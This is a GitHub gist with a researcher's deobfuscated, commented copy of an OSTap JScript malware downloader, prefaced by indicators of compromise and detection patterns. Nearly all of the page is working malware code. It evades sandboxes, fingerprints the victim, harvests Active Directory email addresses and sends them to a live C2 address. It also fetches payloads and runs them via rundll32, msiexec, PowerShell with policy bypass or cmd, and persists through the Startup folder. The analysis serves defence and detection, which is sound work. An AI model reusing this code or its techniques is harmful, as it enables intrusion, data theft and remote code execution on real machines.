Skip to content

Instantly share code, notes, and snippets.

@kirk-sayre-work

kirk-sayre-work/gist:82cdc8f8faba929259bacb8ecea22162

Created February 3, 2021 20:58
Show Gist options
  • Save kirk-sayre-work/82cdc8f8faba929259bacb8ecea22162 to your computer and use it in GitHub Desktop.
Save kirk-sayre-work/82cdc8f8faba929259bacb8ecea22162 to your computer and use it in GitHub Desktop.
Download ZIP
OSTap 2/1/2021 Commented and IOCs
Raw
gistfile1.txt
/*
It looks like the OSTap functionality that copies the OSTap script to files on
mapped drives has been turned off in this sample. The code for this functionality is
there, but a flag is set to false so the code is not run.
IOCs:
Brittle IOCS (easily changed by the OSTap developers):
- C2 IP: 188.127.254.207 (very brittle IOC)
- Script executed with wscript/cscript with command line arguments "To Pa" or "dom"
- wscript/cscript writing files "som.dll" or "ToPa.exe" to disk.
- rundll32 running "som.dll"
- HTTP requests with user agent "Mozilla/5.0 (Windows NT 6.[1-4]; Win64; x64; Trident/7.0; rv:11) like Gecko"
(note the regex for the NT version number).
- A DLL that exports function "DllRegX".
More General IOCs:
Look for wscript processes with the "/E:JScript" or "/E:JScript.Encode" command line option spawning:
* wscript.exe with the "/E:JScript" or "/E:JScript.Encode" command line option.
* powershell.exe with "-noexit -executionpolicy bypass -File " command line options.
* msiexec.exe with "/i" as the only command line option.
* cmd.exe with command line '/C "[\\a-zA-Z0-9\._:]+">>[\\a-zA-Z0-9\._:]+ 2>&1' (note regex for file names).
* rundll32.exe
*/
// Loop waiting for a while.
var loop_index1 = 1;
var big_garbage_string = '';
while (1) {
// Just chew up some memory with this garbage string that is never used.
big_garbage_string = big_garbage_string + "Bd6I";
// Should we actually do something?
loop_index1++;
if (loop_index1 == 176002) {
// Declare some variables that will be used later.
var http_response_text = null;
var file_pointer1 = null;
var new_text_file1 = null;
var file_pointer2 = null;
var file_contents1 = null;
var error_msg1 = "Ko5t5r 4eddr556f";
var wscript_object = this.WScript;
var counter1 = 0;
var error_msg2 = "56445645354356r63544234243";
var activex_object = this.ActiveXObject;
var bogus_except_var = 0;
var finger_print_code1 = 0;
var script_file_name = wscript_object.ScriptFullName;
var finger_print_loop_index = 0;
var wscript_shell_object = wscript_object.CreateObject("WScript.Shell");
var loop_index2 = 1;
// Issue a fake warning popup with the running script is not in the startup directory.
try {
if ((wscript_object.Arguments.Length == 0) && (script_file_name.toLowerCase().indexOf("\\" + "startup" + "\\") == -1)) {
if (false) {
wscript_shell_object.Popup(unescape(error_msg2), 10, unescape(error_msg1), 0);
}
}
} catch (bogus_except_var) {}
break;
}
}
// Start the main OSTap loop.
while (1) {
// Should we actually do something? Note that this functionality will only
// be run once in this script execution.
loop_index2++;
if (loop_index2 == 40301) {
// Declare more variables.
var filesystem_object = new activex_object("Scripting.FileSystemObject");
var c2_url = null;
var curr_enumerator = finger_print_code1;
var wmi_object = null;
var wmi_object2 = null;
var curr_item = null;
var process_list_str = '';
var curr_line = '';
var file_prefix = '';
var drive_enumerator = null;
var drive_item = null;
var random_num = 0;
var computer_name = wscript_shell_object.Environment("PROCESS").Item("COMPUTERNAME");
var user_name = wscript_shell_object.Environment("PROCESS").Item("USERNAME");
var user_domain = wscript_shell_object.Environment("PROCESS").Item("USERDOMAIN");
var network_adapter_str = '';
var antivirus_str = '';
var machine_type = '';
var ldap_str = "no LDAP;";
var curr_email_addr = null;
var email_addr_str = '';
var ldap_default_naming_context = '';
var ldap_rootdse = null;
// Do a bit of anti-sandboxing. Anyone know what sandboxes these checks are looking for?
if (user_domain == "VBOX7-PC" ||
user_domain == "JANUSZ-PC" ||
user_domain == "ABBY-PC" ||
user_domain == "DESKTOP-HRW10" ||
user_domain == "AMAZING-LINGON" ||
user_domain == "SANDBOX-O365" ||
user_name == "Aimy" ||
user_name == "fred" ||
user_name == "Brad") {
// ei9() does not exist, so crash out if a sandbox is detected.
this.ei9("f4r");
}
// Read in the current script contents.
try {
file_pointer1 = filesystem_object.OpenTextFile(script_file_name, 1, false, 0);
file_contents1 = file_pointer1.ReadAll();
file_pointer1.Close();
file_pointer1 = null;
} catch (bogus_except_var) {}
// Are we running with no command line arguments?
if (wscript_object.Arguments.Length == 0) {
// Do some finger printing.
try {
// Grab the 1st 200 running processes and save to a string.
wmi_object = this.GetObject("winmgmts:{impersonationLevel=impersonate}!\\\\.\\root\\cimv2");
counter1 = 0;
curr_enumerator = new this.Enumerator(wmi_object.ExecQuery("Select * from Win32_Process"));
while (!curr_enumerator.atEnd()) {
if (counter1 == 200) break;
curr_item = curr_enumerator.item();
process_list_str = process_list_str + curr_item.Name + "*" + curr_item["ExecutablePath"] + "\r\n"
counter1++;
curr_enumerator.moveNext();
}
// Grab network adapter information and save to a string.
curr_enumerator = null;
counter1 = 0;
curr_enumerator = new this.Enumerator(wmi_object.ExecQuery("Select * from Win32_NetworkAdapterConfiguration Where IPEnabled=TRUE"));
while (!curr_enumerator.atEnd()) {
if (counter1 == 10) break;
curr_item = curr_enumerator.item();
network_adapter_str = network_adapter_str + "*" + curr_item["IPAddress"](0) + "::" + curr_item.Caption;
counter1++;
curr_enumerator.moveNext();
}
// Save the installed AV to a string.
try {
wmi_object2 = this.GetObject("winmgmts:{impersonationLevel=impersonate}!\\\\.\\root\\SecurityCenter2");
curr_enumerator = null;
counter1 = 0;
curr_enumerator = new this.Enumerator(wmi_object2.ExecQuery("Select * from AntiVirusProduct"));
while (!curr_enumerator.atEnd()) {
if (counter1 == 10) break;
curr_item = curr_enumerator.item();
antivirus_str = antivirus_str + curr_item.displayName(0) + "::" + curr_item.pathToSignedReportingExe;
counter1++;
curr_enumerator.moveNext();
}
} catch (bogus_except_var) {}
// Save the classification of the infected machine to a string.
curr_enumerator = null;
counter1 = 0;
try {
curr_enumerator = new this.Enumerator(wmi_object.ExecQuery("Select DomainRole from Win32_ComputerSystem"));
while (!curr_enumerator.atEnd()) {
if (counter1 == 10) break;
curr_item = curr_enumerator.item();
switch (curr_item.DomainRole) {
case 0:
machine_type = "Standalone Workstation";
break;
case 1:
machine_type = "Member Workstation";
break;
case 2:
machine_type = "Standalone Server";
break;
case 3:
machine_type = "Member Server";
break;
case 4:
machine_type = "Backup Domain Controller";
break;
case 5:
machine_type = "Primary Domain Controller";
break;
default:
machine_type = "none";
}
counter1++;
curr_enumerator.moveNext();
}
} catch (bogus_except_var) {}
// Grab all the user email addresses we can get from AD and save those to a string.
// Welcome to the spam list for OSTap droppers.
counter1 = 0;
try {
ldap_rootdse = this.GetObject("LDAP://RootDSE");
ldap_default_naming_context = ldap_rootdse.Get("defaultNamingContext");
ldap_str = "LDAP://" + ldap_default_naming_context;
var adodb_conn_obj = new activex_object("ADODB.Connection");
adodb_conn_obj.Provider = "ADsDSOObject";
adodb_conn_obj.Open("Active Directory Provider");
var adodb_cmd_object = new activex_object("ADODB.Command");
adodb_cmd_object.ActiveConnection = adodb_conn_obj;
adodb_cmd_object.CommandText = "SELECT Mail FROM '" + ldap_str + "' WHERE objectCategory = 'user'";
adodb_cmd_object.Properties("Page Size") = 100;
adodb_cmd_object.Properties("Timeout") = 30;
adodb_cmd_object.Properties("Searchscope") = 2;
adodb_cmd_object.Properties("Cache Results") = false;
var email_query_results = adodb_cmd_object.Execute;
email_query_results.MoveFirst();
while (!email_query_results.EOF) {
if (counter1 == 26000) break;
curr_email_addr = email_query_results("mail") + "*";
if (curr_email_addr != "null*") {
email_addr_str = email_addr_str + curr_email_addr;
}
email_query_results.MoveNext();
counter1++;
};
} catch (bogus_except_var) {}
email_addr_str = ldap_str + ":SUM:" + counter1 + ":" + email_addr_str;
} catch (bogus_except_var) {}
}
// Setup for exfil of finger print data.
var shell_app_obj = new activex_object("Shell.Application");
var temp_dir = wscript_shell_object.ExpandEnvironmentStrings("%TEMP%");
var tmp_id_str = temp_dir;
var basic_recon_str = null;
// Compute a numeric code based on domain, user name, and computer name.
tmp_id_str = user_domain + computer_name + user_name;
for (finger_print_loop_index = 0; finger_print_loop_index < tmp_id_str.length; finger_print_loop_index++) {
finger_print_code1 = (((finger_print_code1 << (5)) - finger_print_code1) + tmp_id_str.charCodeAt(finger_print_loop_index)) & 4294967295;
}
finger_print_code1 = ((finger_print_code1 + 1) >>> 0).toString(16);
// Get the names of various secondary payload files.
var payload_file_name1 = temp_dir + "\\" + finger_print_code1 + 'user_name.Sim';
var payload_file_name2 = temp_dir + "\\" + finger_print_code1 + 'antivirus_str.Gos';
var payload_file_name3 = temp_dir + "\\" + finger_print_code1 + 'user_domain.Ews';
var file_contents1 = '';
// This OSTap sample has 188.127.254.207 as the C2 server.
var c2_url_prefix = "https://188.127.254.207/do/do.php";
var msxml2_obj = new activex_object("Msxml2.DOMDocument");
var base64_element = msxml2_obj.createElement("base64");
var adodb_stream_obj = new activex_object("ADODB.Stream");
var http_obj = new activex_object("Msxml2.ServerXMLHTTP.6.0");
// The recon data will be included in the C2 URL.
basic_recon_str = user_domain + "@@" + computer_name + "@@" + user_name + "@@" + network_adapter_str + "@@" + machine_type + "@@" + antivirus_str + "@@" + email_addr_str;
// Note that only the 1st 300 characters of the recon data are used.
var c2_url_suffix = "?si=I&ko=" + finger_print_code1 + "&cv=" + escape(basic_recon_str.slice(0, 300));
var seperator = "MaxrRfpiii=";
var c2_url_main = c2_url_prefix + c2_url_suffix;
var execution_stage = false;
var startup_folder = shell_app_obj.NameSpace(7);
// This is where we will persist OSTap in the startup folder.
var startup_payload_file_name = startup_folder.Self.Path + "\\" + finger_print_code1 + '.ldap_default_naming_context.jse';
var quit_flag = false;
var use_http_post_flag = false;
var random_num1 = 0;
var looks_like_a_mistake = null;
// Run with command line arguments "To Pa"?
if (wscript_object.Arguments.Length > 0 && wscript_object.Arguments(0) == "To" && wscript_object.Arguments(1) == "Pa") {
try {
wscript_object.Sleep(23905);
looks_like_a_mistake(wscript_object.Arguments(0));
} catch (bogus_except_var) {
try {
// Run file %TEMP%\ToPa ??? I guess?
this['wscript_shell_object'].Run(temp_dir + "\\" + wscript_object.Arguments(0) + wscript_object.Arguments(1), 1);
} catch (bogus_except_var) {}
}
// Quit the current executing OSTap.
wscript_object.Quit(1);
}
// Run with command line arguments "dom"?
if (wscript_object.Arguments.Length > 0 && wscript_object.Arguments(0) == "dom") {
try {
// Run %TEMP%\som.dll with rundll32 and then quit the current executing OSTap.
wscript_object.Sleep(15000);
wscript_shell_object.Exec("rundll32 " + '"' + temp_dir + "\\som.dll" + '"' + " DllRegX");
wscript_object.Sleep(15000);
filesystem_object.DeleteFile(temp_dir + "\\som.dll");
wscript_object.Quit(0);
} catch (bogus_except_var) {
wscript_object.Quit(0);
}
}
// Are we running out of %TEMP% and we have a command line argument?
// In this case we will be renaming payload files and running things.
if (script_file_name.indexOf(temp_dir) > -1 && wscript_object.Arguments.Length > 0) {
try {
// Read in all the contents of a secondary payload file.
file_pointer1 = filesystem_object.OpenTextFile(payload_file_name2, 1, false, 0);
file_contents1 = file_pointer1.ReadAll();
// Fix up the read in file contents.
file_contents1 = file_contents1.replace("[A:true,U:false]", '');
file_pointer1.Close();
file_pointer1 = null;
} catch (bogus_except_var) {}
// Delete the secondary payload file that was read in.
try {
wscript_object.Sleep(2000);
filesystem_object.DeleteFile(payload_file_name2);
} catch (bogus_except_var) {}
// 1st command line argument is "6"?
if (wscript_object.Arguments.length > 1 && wscript_object.Arguments(0) == "6") {
// We're going to save some payload in %TEMP% using the file name given as the 2nd command line argument.
payload_file_name2 = temp_dir + "\\" + wscript_object.Arguments(1);
quit_flag = true;
} else {
// 1st command line argument is not "6". Pick a random name for the payload.
random_num = Math.floor((Math.random() * 65019) + 10);
payload_file_name2 = payload_file_name2.replace(payload_file_name2.slice(-4), random_num + ".cmd");
}
// Decode base64 encoded payload.
try {
// Do the decode.
base64_element.dataType = "bin.base64";
base64_element.text = file_contents1.split(seperator).join('');
adodb_stream_obj.Open();
adodb_stream_obj.Type = 1;
adodb_stream_obj.Position = 0;
adodb_stream_obj.Write(base64_element.nodeTypedValue);
// Save the decoded payload to the file name chosen earlier.
adodb_stream_obj.SaveToFile(payload_file_name2, 2);
adodb_stream_obj.Flush();
adodb_stream_obj.Close();
adodb_stream_obj = null;
file_contents1 = null;
// Should we just save the payload and quit?
if (quit_flag) {
wscript_object.Quit(0);
}
} catch (bogus_except_var) {
// Decoding and saving the payload failed. Give up and quit.
wscript_object.Quit(0);
}
// 1st command line argument is "0"?
if (wscript_object.Arguments(0) == '0') {
// Rename the payload file to "ToPa.exe".
try {
filesystem_object.GetFile(payload_file_name2).Name = "ToPa.exe";
} catch (bogus_except_var) {}
}
// 1st command line argument is "1"?
if (wscript_object.Arguments(0) == "1") {
// Rename the payload file to "som.dll".
try {
filesystem_object.GetFile(payload_file_name2).Name = "som.dll";
} catch (bogus_except_var) {}
}
// 1st command line argument is "5"?
if (wscript_object.Arguments(0) == "5") {
// In this case it looks like the dropped payload was a MSI file. Install the MSI with msiexec.
try {
shell_app_obj.ShellExecute("msiexec", "/i " + '"' + payload_file_name2 + '"', '', "open", 1);
} catch (bogus_except_var) {}
}
// 1st command line argument is "4"?
if (wscript_object.Arguments(0) == "4") {
// Rename the payload file.
try {
shell_app_obj.ShellExecute("cmd", "/C " + '"' + payload_file_name2 + '"' + ">>" + payload_file_name3 + " 2>&1", '', "open", 0);
} catch (bogus_except_var) {}
}
// 1st command line argument is "3"?
if (wscript_object.Arguments(0) == "3") {
// In this case it looks like the dropped payload was a powershell file. Run the powershell.
try {
seperator = payload_file_name2 + ".ps1";
filesystem_object.MoveFile(payload_file_name2, seperator);
shell_app_obj.ShellExecute("powershell", "-noexit -executionpolicy bypass -File " + '"' + seperator + '"', '', "open", 0);
} catch (bogus_except_var) {}
}
// 1st command line argument is "3"?
if (wscript_object.Arguments(0) == "2") {
// Copy the payload to the startup directory.
try {
filesystem_object["CopyFile"](payload_file_name2, startup_payload_file_name, true);
} catch (bogus_except_var) {}
break;
}
try {
// Delete initial payload.
filesystem_object.DeleteFile(payload_file_name1);
} catch (bogus_except_var) {}
break;
}
// Start the loop hitting the C2 server.
while (7) {
try {
// We're going to be tacking on a random number as a GET parameter in each request.
c2_url = c2_url_main + "&" + Math.floor((Math.random() * (20000)) + 1) + Math.floor((Math.random() * (26800)) + 1);
http_obj.setOption(2, 13056);
// Sometimes do a GET, sometimes do a POST.
if (!use_http_post_flag) {
http_obj.open("GET", c2_url, false);
} else {
http_obj.open("POST", c2_url, false);
}
// Pick a user agent. Choose "NT 6.[1..4]" randomly.
random_num = Math.floor((Math.random() * 3) + 1);
http_obj.setRequestHeader("User-Agent", "Mozilla/5.0 (Windows NT 6." + random_num + "; Win64; x64; Trident/7.0; rv:11) like Gecko");
// Doing a GET?
if (!use_http_post_flag) {
http_obj.send();
} else {
// Doing a POST.
use_http_post_flag = false;
http_obj.send(escape(file_contents1));
try {
filesystem_object.DeleteFile(payload_file_name3);
} catch (bogus_except_var) {}
}
// Did we hear back from the C2 server?
if (http_obj.status == 200) {
// What does the C2 server have for us?
http_response_text = http_obj.responseText;
try {
// Do we have the chunk seperator we expect to see in a base64 encoded payload?
if (http_response_text.indexOf(seperator) > -1) {
// We might be looking for the "info-package" value in the Content-Disposition ??
execution_stage = (http_obj.getResponseHeader("Content-Disposition").indexOf("info-") > -1);
if (execution_stage) {
// Pause for a while if we already have a payload file.
file_contents1 = "nodata";
try {
if (!filesystem_object.FileExists(payload_file_name3)) {
wscript_object.Sleep(30000);
}
} catch (bogus_except_var) {}
// Read in the contents of the current payload file.
try {
file_pointer1 = null;
file_pointer1 = filesystem_object.OpenTextFile(payload_file_name3, 1, false, 0);
file_contents1 = file_pointer1.ReadAll();
file_pointer1.Close();
file_pointer1 = null;
} catch (bogus_except_var) {
file_contents1 = "error";
}
// Looks like we are going to POST to the C2 server sometime.
use_http_post_flag = true;
continue;
}
// I don't know what "llx-" is looking for.
execution_stage = (http_obj.getResponseHeader("Content-Disposition").indexOf("llx-") > -1);
if (execution_stage) {
execution_stage = 1;
} else {
// I don't know what "upd-" is looking for.
execution_stage = (http_obj.getResponseHeader("Content-Disposition").indexOf("upd-") > -1);
if (execution_stage) {
execution_stage = 2;
} else {
// I don't know what "pws-" is looking for.
execution_stage = (http_obj.getResponseHeader("Content-Disposition").indexOf("pws-") > -1);
if (execution_stage) {
execution_stage = 3;
} else {
// I don't know what "cmd-" is looking for.
execution_stage = (http_obj.getResponseHeader("Content-Disposition").indexOf("cmd-") > -1);
if (execution_stage) {
execution_stage = 4;
} else {
// I don't know what "msi-" is looking for.
execution_stage = (http_obj.getResponseHeader("Content-Disposition").indexOf("msi-") > -1);
if (execution_stage) {
execution_stage = 5;
} else {
// I don't know what "bin-" is looking for.
execution_stage = (http_obj.getResponseHeader("Content-Disposition").indexOf("bin-") > -1);
if (execution_stage) {
execution_stage = 0;
} else {
execution_stage = http_obj.getResponseHeader("Content-Disposition");
execution_stage = "6 " + execution_stage.slice(execution_stage.indexOf("filename=") + 9).split("_")[1];
}
}
}
}
}
}
// Pause for a while if some other payload file exists.
try {
if (filesystem_object["FileExists"](payload_file_name2)) {
wscript_object.Sleep(31131);
}
} catch (bogus_except_var) {}
// Wrie the raw payload sent from the C2 server to disk.
new_text_file1 = filesystem_object.CreateTextFile(payload_file_name2, true, false);
new_text_file1.Write(http_response_text);
new_text_file1.Close();
new_text_file1 = null;
// Does the old payload look like it is JavaScript?
if (file_contents1.indexOf("catch(") > -1) {
// Save the old payload to a new file.
new_text_file1 = filesystem_object.CreateTextFile(payload_file_name1, true, false);
wscript_object.Sleep(32030);
new_text_file1.WriteLine(file_contents1);
new_text_file1.Close();
// We're going to be running regular JavaScript.
new_text_file1 = "/E:JScript ";
} else {
// That old payload is not JavaScript. The current running script IS JavaScript, so
// copy it over into a new file.
try {
filesystem_object.CopyFile(script_file_name, payload_file_name1, true);
} catch (bogus_except_var) {}
// We're going to be running encoded JavaScript.
new_text_file1 = "/E:JScript.Encode ";
}
// Run the JavaScript payload that we just wrote into a file.
try {
// First run it with the execution stage given on the CL.
wscript_shell_object.Exec("wscript " + new_text_file1 + '"' + payload_file_name1 + '"' + " " + execution_stage);
// If the stage is 0, also run it with the CL arguments "To Pa".
if (execution_stage == 0) {
wscript_shell_object.Exec("wscript " + new_text_file1 + '"' + payload_file_name1 + '"' + " To Pa");
}
// If the stage is 1, also run it with the CL arguments "dom".
if (execution_stage == 1) {
wscript_shell_object.Exec("wscript " + new_text_file1 + '"' + payload_file_name1 + '"' + " dom");
}
} catch (bogus_except_var) {
// As a fallback try running the JS payload with cscript rather than wscript.
this['wscript_shell_object'].Run("cscript " + new_text_file1 + '"' + payload_file_name1 + '"' + " " + execution_stage, 0);
}
wscript_object.Sleep(31810);
continue;
} else {
wscript_object.Sleep(31200);
continue;
}
} catch (bogus_except_var) {
wscript_object.Sleep(34000);
continue;
}
} else {
wscript_object.Sleep(30510);
continue;
}
} catch (bogus_except_var) {
wscript_object.Sleep(33000);
continue;
}
wscript_object.Sleep(32100);
};
wscript_object.Sleep(37020);
continue;
};
};
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment